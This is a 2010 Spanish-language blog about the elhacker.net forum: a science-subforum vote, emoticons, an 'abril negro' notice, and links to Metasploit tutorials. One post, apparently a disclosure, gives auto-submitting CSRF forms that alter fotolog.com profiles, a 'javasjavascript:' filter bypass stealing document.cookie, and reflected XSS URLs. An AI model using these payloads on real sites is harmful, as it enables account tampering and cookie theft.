24 febrero 2010

Subforo de Ciencias Exactas

2 comentarios
Bueno, en estos ultimos dias, el tema de discucion en el foro era la creacion de un nuevo subforo sobre las ciencias exactas propuesto por el usuario final_frontier.
Muchos usuarios no pertenecientes al staff estaban completamente de acuerdo, aunque como siempre, la ultima palabra la tienen ellos, el staff. Siguiendo con un foro democratico se realizo porparte de sdc si no me equivoco, una votacion interna la cual resulto con 64.7% a la no creacion del mismo. El usuario apokliptico se quedo con las ganas diciendo de que lo seguira intentando.

Pero bueno, todavia se puede publicar sobre este tema en foro libre!, y no puede faltar la cita del comentario de anon que puede ser muy util para este tema:




Google Indexa a foro.elhacker.net en menos de 1 minuto te lo aseguro, si alguien quiere buscar como resolver integrales en foro.elhacker.net solo tiene que poner, en la búsqueda:

Código:
site:foro.elhacker.net resolver integrales
http://foro.elhacker.net/programacion_cc/ayuda_programa_para_integrales-t234538.0.html;msg1119829
http://foro.elhacker.net/foro_libre/obtener_una_integral_a_partir_del_resultado-t281288.0.html;msg1388172

Otros temas matemáticos

http://foro.elhacker.net/desafios_wargames/pi-t256765.0.html
http://foro.elhacker.net/programacion_general/lenguaje_para_matematicas-t214905.0.html;msg1053766
http://foro.elhacker.net/foro_libre/mates_problemas_con_numeros_grandes_y_programas_interesantes-t186388.0.html
http://foro.elhacker.net/foro_libre/iquestcoleccion_de_preguntas_matematicas_o_paginas_web_de_mate-t270093.0.html
http://foro.elhacker.net/desafios_wargames/otro_de_matematicas-t154527.0.html;msg727868
http://foro.elhacker.net/foro_libre/problema_de_combinatoria_matematicas-t264897.0.html;msg1294821
http://foro.elhacker.net/foro_libre/hilo_de_ciencias_matematicas_etc-t173128.0.html
http://foro.elhacker.net/desafios_wargames/acertijo_de_matematicas-t173194.0.html
http://foro.elhacker.net/criptografia/preguntas_sobre_rsa_matematicas-t183043.0.html

Temas de Fisica y otros

http://foro.elhacker.net/foro_libre/iquestalgun_estudiante_de_fisica_en_el_foro-t271557.0.html;msg1348397
http://foro.elhacker.net/desafios_wargames/fisica_problema-t191256.0.html
http://foro.elhacker.net/foro_libre/ingenieria_informatica_mi_sueno-t270231.225.html
http://foro.elhacker.net/foro_libre/nueva_forma_de_generar_electricidad_sin_contaminar-t147026.0.html;msg693936

Es cierto no hay muchos temas, igual me da si se crea el subforo o no, si se crea yo estaré ahi, ya que los temas estarán concentrados en un solo lugar.

Saludos




Esto es todo. Pero la verdad, pienso un poco como el staff, ya esta el foro libre y se puede usar el mismo ramal. lo unico que no me gustó, fue el decir que las ciencias exactas no se relacionan con la informatica en eso no estoy de acuerdo, ustedes?

un saludo grande, castg.

14 febrero 2010

Abril negro... a prepararse!

4 comentarios
Como todos los años, pronto (1 mes y medio), va a comenzar el famoso mes "abril negro", donde todos, vamos a poder "Lammerear", presentar programas fueras de las normas para "juankear", como siempre esto tiene una explicación... Aquellos que quieran presentar una herramienta y no se acordaron de abril negro, es la fecha perfecta para empezar a crear algo y presentarlo en el foro, asique no creo que este de mas una aviso...
Aparte cabe recordar que el usuario 50l3r va a presentar la version de Dioxis 5.1, que ya se adelanto y la tiene lista para el abril negro.

Aviso:el que quiera dar una sugerencia al blog, si le gusta o quiere formar parte agregar(msn) o directamente PUBLICITAR algo que fue puesto en el foro avisar a fede_cp@elhacker.net.

saludos!

12 febrero 2010

Adios navidad!

2 comentarios
Y como era de esperar por los usuarios de elhacker, ya se fue el logo de elhacker nevado y con el gorrito de navidad y todos los iconos de navidad ¡Al fin!, ya era necesaria una modificación, ahora se esta dando la propuesta, para que sean fantasmitas, asique si alguien tiene ganas de hacer algun prototipo de fantasmin, que lo postee en el foro:

elbrujo:
"
¿qué tal un set de fantasmitas? :laugh:

Los actuales smilies de Chef se eligieron por votación del staff y yo no voté.

Las opciones eran:

Classic


Calabazas


Babys


Afro


Chef


Cowboy


Militares


"

y claro al staff le gusto mas el cheff


link al foro: http://foro.elhacker.net/battle_arts/emoticones_de_el_foro-t284200.0.html



saludos!

edito castg.........

El brujo habló, Castg respondió.

bueno, quiero agregar los iconos que hice. el brujo habia dicho unos iconos de fantasmitas, y empece a trabajar. no quedaron de lo mejor, pero quedaron xD!

aca los finales, creados por mi, pero no se todavia se si van a utilizar o no ya que el-brujo esta sin internet :s...




bueno y que decis brujo? tenemos con esto otros estilos de emoticones para el foro?

un saludo grande, Castg!

07 febrero 2010

Castg, fede_cp, fotolog, una lucha!

0 comentarios
Post realizado por castg...

[
Bueno bueno, que mas, les voy a contar TODO! porque quiero un post bien larguito xD!

Empiezo, estaba en la casa de fede y me mostro un csrf para borrar comentarios de las fotos, bueno, pasa que este es re conocido :p y dijimos, bueno, ya encontramos 2 xss y un "ftp" de la api de fotolog (aunque no lo sepan, el genio de fede en el dominio http://si.fotolog.com/i94/ encontro que estaban habilitados los indexes de apache y se podia navegar por los codigos fuentes de fotolog xD! testigos: WHK y SDC) y los xss uno lo encontro fede hace banda en el "redirect=" del cambio de idioma y yo hace poco (solo funciona en IE) otro medio raro, pero no taban tan piolas, la cosa era encontrar mas, mejor cantidad y menos calidad. nos pusimos a ver el perfil y a modificarlo, nos dimos cuenta que no pedia contraseña como en otros casos, vimos el codigo fuente del formulario y tampoco tenia token.
Wow! copiamos el formulario y empezamos a depurar, ni bien empezamos nos tubimos que ir (para mi casa xD!) y aca (en mi casa ;-)) despues de boludear y boludear, encontramos otro csrf, pero no depuramos nada ni tampoco usamos el otro fichero, el de la casa de fede.

entonces hoy agarro y digo (ya solito en mi casa y fede en la suya) postiemos los 2 CSRF en elhacker.net asi [ego]ven que tanto inteligentes somos![/ego] y cunado me pongo a buscar los formularios, a depurar (que llevo su tiempo la verdad!!) y todo eso, me propongo buscar mas csrf, y encontre uno mas, boludiando por el perfil tambien me di cuenta que baypaseando se puede agregar un link a: "‭‬javascript:alert(1)" y por ultimo encontre otro xss. al ver esto decimos, en que garcha subimos nuestras fotos?, y si, es una garcha. jajaj. ahora voy a poner los formularios de los CSRF seguido de como baypasear y despues donde esta el xss.
Guarda con los formularios porq se mandan solos automaticamente se abren...

1er formulario: (este modifica los datos personales...)

Código
<body onload="document.update_prefs.submit()">
<form id="settings" action="http://account.fotolog.com/profile" name="update_prefs" method="post" enctype="multipart/form-data">
<input type="hidden" class="checkbox" id="display_bio" name="display_bio" checked value="true">
<input type="hidden" id="bio_statement" name="bio_statement" wrap="virtual" value="Te cabieron el pote!">
<input type="hidden" class="checkbox" id="display_image" name="display_image" checked value="false">
<input type="hidden" id="image" name="image" class="lg">
<input type="hidden" id="firstname" name="firstname" class="lg" value="Me ponwearon" maxlength="32">
<input type="hidden" id="lastname" name="lastname" class="lg" value="Fede_cp y Castg" maxlength="32">
<input type="hidden" class="radio" name="gender" id="g_0" value="0">
<input type="hidden" class="radio" name="gender" id="g_1" value="1">
<input type="hidden" class="radio" name="gender" id="g_2" value="2">
<input type="hidden" id="profession" name="profession" class="lg" value="Ser powneado :'(" maxlength="40">
<input type="hidden" class="med" name="new:plink:0:name" value="Castg! y Fede_cp son los ***** amos!" maxlength="64">
<input type="hidden" class="med" name="new:plink:0:url" value="http://google.com" maxlength="64">
<input type="hidden" class="med" name="new:plink:1:name" value="xss no, terrible pelotudes see!!!" maxlength="64">
<input type="hidden" class="med" name="new:plink:1:url" value="javasjavascript:cript:alert(document.cookie)" maxlength="64">
<input type="hidden" class="checkbox" name="delete:new:plink:0">
<input type="hidden" class="checkbox" name="delete:new:plink:1">
<input type="hidden" name="new:plink:1" value="1">
<input type="hidden" id="country" name="country" value="_N">
<input type="hidden" id="state" name="state" value="00">
<input type="hidden" name="city" id="city" maxlength="128" class="med" value="El ciber mundo!">
<input type="hidden" name="language" value="tr">
<input type="hidden" name="new:camera:0:type" value="3">
<input type="hidden" id="fotolog_description" name="fotolog_description" wrap="virtual" value=":P">
<input type="hidden" name="new:camera:0:brand" value="Logitech" class="sm" maxlength="32">
<input type="hidden" name="new:camera:0:model" value="¿?" class="sm" maxlength="32">
<input type="hidden" type="checkbox" name="delete:new:camera:0">
<input type="hidden" name="new:camera:0" value="1">
<input type="hidden" id="music" name="music" wrap="virtual" class="med" value="Reggae con un fasito!">
<input type="hidden" id="movies" name="movies" wrap="virtual" value="Garganta Profunda (busquen en el puto google ¬¬)">
<input type="hidden" id="sports" name="sports" wrap="virtual" value="Lucha en el barro!">
<input type="hidden" class="med" name="new:favlink:0:name" value="I'm cagado!" maxlength="64">
<input type="hidden" class="med" name="new:favlink:0:url" value="http://google.com" maxlength="64">
<input type="hidden" class="checkbox" name="delete:new:favlink:0">
<input type="hidden" name="new:favlink:0" value="1">
</form>
</body>

2do formulario: (este modifica los colores y titulo...)

<body onload="document.update_prefs.submit()">

<form name="update_prefs" action="http://account.fotolog.com/page_design" id="settings" method="post" enctype="multipart/form-data">
<input type="hidden" name="title" value="Me cabieron el pote!">
<input type="hidden" name="margin_txt_color" value="FFFFFF">
<input type="hidden" name="margin_link_color" value="33FF00">
<input type="hidden" name="margin_bg_color" value="FFFF00">
<input type="hidden" name="text_color" value="FFFFFF">
<input type="hidden" name="hyperlink_text_color" value="FFFF00">
<input type="hidden" name="background_color" value="FFFF00">
</form>
</body>
3er formulario: (noticias por mail... "newlestter")
<body onload="document.update_prefs.submit()">

<form name="update_prefs" method="post" enctype="multipart/form-data" id="settings">
<input type="hidden" name="receive_email_digest" value="true">
<input type="hidden" name="receive_updates" value="true">
<input type="hidden" name="receive_newsletter" value="true">
<input type="hidden" name="receive_promotionals" value="true">
</form>
</body>



Bypass en URL: (el bypass lo descubrio favaloro, un medico argentino)

bueno, en http://account.fotolog.com/profile en la parte de enlaces personales ponen el nombre q se les cante, si son floggers ponegan "mail de cumbio" y pican al toq xD!, y en url si ponen ‭‬javascript:alert(1); se los transforma en http://alert(1)/; entonces si ponemos javasjavascript:cript:alert(1); borra el ‭‬javascript armado, uniendo los separados . entonces cuando ponen click en el "link" saltara un alert con el mesaje "1".



XSS: (aca no tengo nada para poner :p)

muy simple,
aca uno: (salta 5 veces) http://txn.fotolog.com/gift_store?u=%22%3E%3Cscript%3Ealert%28%27xss%20by%20castg%27%29;%3C/script%3E

aca otro parecido pero nomas que saltan 7 :P : http://txn.fotolog.com/gift_store?id=712&u=%22%3E%3Cscript%3Ealert(%27xss%20by%20castg%27);%3C/script%3E


]


Link!:http://foro.elhacker.net/nivel_web/fedecp_y_castg_simple_disclosure_de_fotologcom_xd-t283719.0.html;msg1400445#msg1400445

02 febrero 2010

Algunos posts acerca de Metasploit framework!

0 comentarios
Bueno gente, aca van todos los tutoriales que pude encontre de metasploit en el foro: van con autor, del post!, no necesariamente del tutorial

Karmetasploit


Explicación:

Karmetasploit sirve para crear puntos de acceso falsos, capturar contraseñas, recopilar infomación, y llevar a los ataques de navegador contralos clientes. Resumiendo: Karmetasploit es una pasada.

Autor:Shell Root y trashhgoo

link:http://foro.elhacker.net/hacking_avanzado/metasploit_karmetasploit-t280195.0.html


Java Applet Infection

Excplicación:

Está infección permite la ejecución de codigo remoto, por medio del navegador. Para lograr nuestro objetivo, necesitamos tener instalado dentro de nuestro P.C, algunos componentes necesarios para la compilación y ejecución de alguns archivos.

Autor: Shell Root

link:http://foro.elhacker.net/hacking_avanzado/metasploit_java_applet_infection-t281594.0.html


Habilitar Escritorio Remoto


Explicación:

Una de las muchas herramientas que trae integrada el Metasploit aparte de la que ya hemos visto (keyylogger, Screenshot, Ver Escritorio Remoto ). Tambien podemos agregar un usuario y habilitar el escritorio remoto de la P.C Remota con tan solo una ejecucion de un comando. Aquí veremos el uso de esté servicio del Metasploit.

Autor:Shell Root

link:http://foro.elhacker.net/hacking_avanzado/metasploit_habilitar_escritorio_remoto-t278825.0.html

[Metasploit + 0-day IE] Exploit IE_Aurora

Explicación: Ejecución de un exploit 0-day en IE con la utilizacion de metasploit.

Autor: Shell Root

link: http://foro.elhacker.net/hacking_avanzado/metasploit_0day_ie_exploit_ieaurora-t281678.0.html


[Metasploit] Infectando Linux con Troyano

Explicación:Es infectado con un troyano linux 9.10, con un exploit lanzando desde metasploit

Autor:Shell Root

Link:http://foro.elhacker.net/hacking_avanzado/metasploit_infectando_linux_con_troyano-t281967.0.html


Generando Ejecutable con PAYLOAD

Explicación:

Despues de explotar la vulnerabilidad en sistemas Windows XP SP 2 [445/tcp "Microsoft Windows XP microsoft-ds"] con el exploit exploit/windows/smb/ms08_067_netapi. Ahora veremos como obtener una session del Meterpreter cuando la victima ejecute un archivo Ejecutable.

Autor:Shell Root

Link: http://foro.elhacker.net/hacking_avanzado/metasploit_generando_ejecutable_con_payload-t279407.0.html


Suplantación de Usuarios

Autor:Shell Root

Link:http://foro.elhacker.net/hacking_avanzado/metasploit_suplantacion_de_usuarios-t279100.0.html


Estos son algunos de los tutoriales que hay en el foro, pero como se puede notar, Shell Root es uno de los creadores de muchos, asique bien por eso!

Faltan algunos pero estos los considere como mas actualizados que otros.


saludos!


fede_cp